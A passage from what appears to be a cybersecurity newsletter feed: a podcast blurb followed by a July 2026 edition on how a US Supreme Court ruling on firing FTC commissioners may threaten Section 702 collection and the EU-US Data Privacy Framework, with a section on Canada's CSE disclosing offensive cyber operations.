href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> discuss just how important exploits are for cyber operations using data published in a new paper authored by two members of Ukraine&#x2019;s cyber security agency.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN174.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN174/&quot;&gt;Between Two Nerds: Exploits are not cyber power&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 30:08 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: Exploits are not cyber power&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/k6KALEsKpiA?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: Exploits are not cyber power"></iframe></figure>
  102. Srsly Risky Biz: Supreme Court Undermines Section 702

    Thu, 09 Jul 2026 08:48:42 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://sublime.security/"><em><u>Sublime Security</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-3c4031ee-58f2-4821-ab76-b79872bfc504-1.jpeg" alt="Srsly Risky Biz: Supreme Court Undermines Section 702"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://sublime.security/"><em><u>Sublime Security</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB174.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB174/&quot;&gt;Srsly Risky Biz: US Supreme Court undermines Section 702 intel&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 27:55 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: US Supreme Court undermines Section 702 intel&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-3c4031ee-58f2-4821-ab76-b79872bfc504.jpeg" class="kg-image" alt="Srsly Risky Biz: Supreme Court Undermines Section 702" loading="lazy" width="2000" height="1333" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/07/data-src-image-3c4031ee-58f2-4821-ab76-b79872bfc504.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/07/data-src-image-3c4031ee-58f2-4821-ab76-b79872bfc504.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/07/data-src-image-3c4031ee-58f2-4821-ab76-b79872bfc504.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/07/data-src-image-3c4031ee-58f2-4821-ab76-b79872bfc504.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@claireandy?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Claire Anderson</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/gray-pillars-Vq__yk6faOI?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>A new US Supreme Court decision could undermine the flow of Section 702 intelligence collection from Europe.</p><p>Section 702 allows the US government to collect intelligence on people outside the US with compelled help from communication service providers and is regarded as the <a href="https://www.lawfaremedia.org/article/usa-liberty-act-house-judiciarys-proposed-reauthorization-section-702"><u>crown jewel</u></a> of American foreign intelligence collection.&#xA0;</p><p>Since 2000, successive data sharing agreements have facilitated transatlantic commerce by allowing the legal transfer of personal data from the EU to the US. Section 702 collection from Europe relies on these data flows and the intelligence program has been at the heart of legal challenges to the data sharing agreements.&#xA0;</p><p>The underlying principle on the EU side is that European companies should only be able to transfer data overseas if the recipient country <a href="https://www.lawfaremedia.org/article/after-schrems-ii-proposal-meet-individual-redress-challenge"><u>has &quot;essentially equivalent&quot; privacy protections</u></a>. More than <a href="https://www.dataprivacyframework.gov/list"><u>3,600 US businesses</u></a> are active in the current data sharing program.&#xA0;</p><p>Enter the US Supreme Court which, late last month, <a href="https://www.supremecourt.gov/opinions/25pdf/25-332_qn12.pdf"><u>ruled</u></a> that President Donald Trump acted legally when he fired Commissioner Rebecca Slaughter without cause from the notionally independent Federal Trade Commission (FTC).&#xA0;</p><p>The court decided that <a href="https://www.law.cornell.edu/uscode/text/15/41"><u>a law</u></a> that stated commissioners could only be removed for &quot;inefficiency, neglect of duty, or malfeasance in office&quot; was unconstitutional.&#xA0;</p><p>As a result of this decision, Austrian privacy advocate Max Schrems, whose legal challenges <a href="https://uk.practicallaw.thomsonreuters.com/Glossary/UKPracticalLaw/I20836e9fbe3a11f09eb2cf77be1665bc?transitionType=Default&amp;contextData=%28sc.Default%29"><u>have resulted</u></a> in <a href="https://uk.practicallaw.thomsonreuters.com/Glossary/UKPracticalLaw/Iafe266c7be3c11f0b5e1f6185fe336a9?transitionType=Default&amp;contextData=(sc.Default)&amp;comp=pluk"><u><em>two</em> previous</u></a> EU-US data sharing agreements being kiboshed, <a href="https://therecord.media/supreme-court-decision-threatens-eu-us-data-sharing"><u>has taken aim</u></a> at the current agreement, the EU-US <a href="https://www.dataprivacyframework.gov/Program-Overview"><u>Data Privacy Framework</u></a> (DPF).&#xA0;</p><p><a href="https://noyb.eu/sites/default/files/2026-06/Letter_noyb_EU-US_data_transfers.pdf"><u>Schrems argues</u></a> that the Supreme Court&apos;s decision means &quot;any independent executive authorities in the US are unconstitutional&quot;. We never went to law school, but being able to fire people willy-nilly does seem to undermine the idea of an independent body.&#xA0;</p><p>The ramifications of the decision for EU-US data transfers are potentially far-reaching.&#xA0;</p><p>One underlying requirement of the <a href="https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:12012P/TXT#d1e167-393-1"><u>European Charter of Fundamental Rights</u></a> is that personal data protections are &quot;subject to control by an independent authority&quot;.&#xA0;</p><p>The European Commission <a href="https://eur-lex.europa.eu/legal-content/EN/TXT/HTML/?uri=CELEX:32023D1795"><u>implementing decision</u></a>, which effectively endorses the DPF, specifically names the FTC and the US Department of Transport as notional independent authorities.&#xA0;</p><p>We&apos;d be hard-pressed to argue that federal US privacy protection law is as strong as Europe&apos;s, but since the 2000s the European Commission and the US Government have bent over backwards to devise schemes that facilitate data flows.&#xA0;</p><p>This is illustrated by the two governments&#x2019; consistent efforts to create new schemes after previous iterations are struck down by European courts. It&apos;s a <a href="https://jeremydmiller.com/2024/09/02/time-is-a-flat-circle/"><u>flat circle</u></a>:&#xA0;</p><ol><li>The US Government and European Commission develop and implement a new data transfer agreement</li><li>Max Schrems challenges the agreement in the Court of Justice for the European Union (CJEU)&#xA0;</li><li>He wins</li><li>The scheme is invalidated, and</li><li>Proceed to step 1</li></ol><p>The CJEU invalidated Safe Harbor, the first such scheme, in 2015 and the second, Privacy Shield, in 2020.</p><p>The court is particularly concerned about protecting European citizens from US intelligence collection activities. In the <a href="https://noyb.eu/files/CJEU/judgment.pdf"><u>Schrems II decision</u></a> that struck down Privacy Shield, the court noted that European citizens had no way to appeal US Section 702 foreign intelligence collection in an &quot;actionable&quot; way before an independent court.&#xA0;</p><p>From the perspective of an American intelligence professional, this is ridiculous. Why should intelligence collection targets have judicial rights of appeal?&#xA0;&#xA0;&#xA0;</p><p>Even so, President Joe Biden&apos;s administration tried to balance US Signals Intelligence (SIGINT) collection against European human rights protections.</p><p>In 2022, President Biden <a href="https://www.federalregister.gov/documents/2022/10/14/2022-22531/enhancing-safeguards-for-united-states-signals-intelligence-activities"><u>issued Executive Order 14086</u></a> on &quot;Enhancing Safeguards For United States Signals Intelligence Activities&quot;. The EO defined permitted national security objectives, explicitly ruled out some activities, required that everyone&apos;s privacy and civil liberties rights be taken into account, including foreigners, and mandated that intelligence collection be necessary and proportionate to meet a validated intelligence priority.</p><p>The EO also set up a review and redress mechanism, <a href="https://www.justice.gov/opcl/redress-data-protection-review-court"><u>the Data Protection Review Court</u></a>. Although classification issues meant the court was unlikely to provide a complainant with a substantive response, its rulings were binding on the intelligence community.&#xA0;</p><p>The <a href="https://www.odni.gov/files/documents/CLPO/Section_1062_ODNI_CLPT_Annual_Report_CY2024.pdf"><u>latest annual report</u></a> of the US intelligence community&apos;s Office of Civil Liberties, Privacy and Transparency recorded just a single European complaint being made per this EO in 2024</p><p>At the time the EO was issued we called it &quot;Kafkaesque, but good&quot;. In our view, it wouldn&apos;t materially change US intelligence collection practices, but it reinforced that the US and EU had similar underlying principles of what constituted acceptable intelligence collection. From <a href="https://news.risky.biz/bidens-sigint-executive-order-is-65c0eb42a0e6da001a37dfe9/"><u>our article</u></a> on the EO:</p><p>The EO explicitly prohibits certain SIGINT activities including suppressing legitimate privacy interests, suppressing dissent or free expression, and disadvantaging persons based on their &quot;ethnicity, race, gender, gender identity, sexual orientation, or religion&quot;. It also rules out collection of &quot;foreign private commercial information or trade secrets to afford a competitive advantage to United States companies and United States business sectors commercially.&quot;</p><p>So much of what is normal for Chinese APTs is explicitly banned! What would their APT crews do if they were banned from targeting Uyghurs, the Hong Kong protest movement and companies for intellectual property theft? They&apos;d have to get new jobs!</p><p>We don&apos;t think US intelligence collection practices have changed all that much in recent years, but there <em>are </em>good <a href="https://www.washingtonpost.com/politics/2026/03/19/inspector-general-independence-trump/"><u>reasons</u></a> to doubt the Trump administration&apos;s commitment to independent oversight.</p><p>When it comes to intelligence oversight, President Trump <a href="https://cdt.org/insights/what-the-pclob-firings-mean-for-the-eu-us-data-privacy-framework/"><u>dismissed three Democrat members</u></a> of the Privacy and Civil Liberties Board (PCLOB) in January 2025, leaving it <a href="https://www.pclob.gov/Board/Index"><u>with just a single Republican member</u></a> and consequently without a quorum. The PCLOB oversees the Data Protection Review Court and is one of the *ahem* &apos;independent bodies&apos; that the European Commission cited in its decision to approve the DPF.</p><p>Couple the Trump administration&apos;s actions with the Supreme Court&apos;s recent decision and we can see there might be reasons for concern. Schrems will also argue that this is a constitutional clash: EU treaty law demands independent supervisory authorities but the US constitution now prohibits them.&#xA0;</p><p>Not everyone agrees with Schrems&apos; argument, however. Austin Mooney, international privacy and cybersecurity partner at the law firm Dechert in Washington DC, told <em>Seriously Risky Business </em>that he thought that it &quot;seems like a stretch&quot;. Mooney says that the FTC&apos;s independence was not a central feature of the DFP or even of past efforts to challenge data transfers.</p><p>Mooney added that Schrems &quot;has a strong track record&quot; challenging these frameworks, so both European and US companies will be watching closely to see if current data transfer arrangements are once again thrown into disarray.&#xA0;&#xA0;</p><p>Another round in the on-again, off-again EU-US data transfer agreement merry-go-round is kicking off.</p><h2 id="cse-tiptoes-out-of-the-cyber-closet">CSE Tiptoes Out of the Cyber Closet&#xA0;</h2><p>Canada&apos;s signals intelligence agency has taken another step forward in normalising its use of offensive cyber capabilities by making more comprehensive disclosures than ever before in its latest annual report.&#xA0;</p><p>According to <a href="https://laws-lois.justice.gc.ca/eng/acts/C-35.3/page-1.html"><u>legislation</u></a> that defines Communications Security Establishment Canada&apos;s (CSE) functions, active cyber operations &quot;degrade, disrupt, influence, respond to or interfere with the capabilities, intentions or activities of a foreign individual, state, organization or terrorist group as they relate to international affairs, defence or security&quot;. These are also known variously in the Five Eyes as offensive cyber operations or cyber effects.&#xA0;</p><p>In this year&apos;s <a href="https://www.cse-cst.gc.ca/en/accountability/transparency/reports/communications-security-establishment-canada-annual-report-2025-2026"><u>annual report</u></a> CSE details three such operations.&#xA0;</p><p>In the first operation, CSE worked with Five Eyes partners and law enforcement against a &quot;notorious&quot; Ransomware-as-a-Service group. Its operation disabled the group&apos;s infrastructure and deleted a large amount of stolen data advertised for sale on the dark web.</p><p>CSE also conducted operations to disrupt the trade in fentanyl precursors into Canada. The organisation used its foreign intelligence capabilities to locate cybercriminals outside the country who were brokering the sale of precursor chemicals. It then used active cyber operations that &quot;disrupted and diminished their ability to operate&quot;.&#xA0;</p><p>The report implied that CSE collected intelligence to identify key points of leverage so that this cyber operation could get the most bang for its buck.</p><p>In the final case study, CSE tackled a foreign extremist group spreading violent ideology and seeking to recruit Canadians to its cause. CSE says it used its SIGINT capabilities to analyse the group for weaknesses that could be used to disrupt its operations.&#xA0; It says that its cyber operation &quot;successfully undermined the group&#x2019;s credibility and limited their ability to radicalise and recruit new 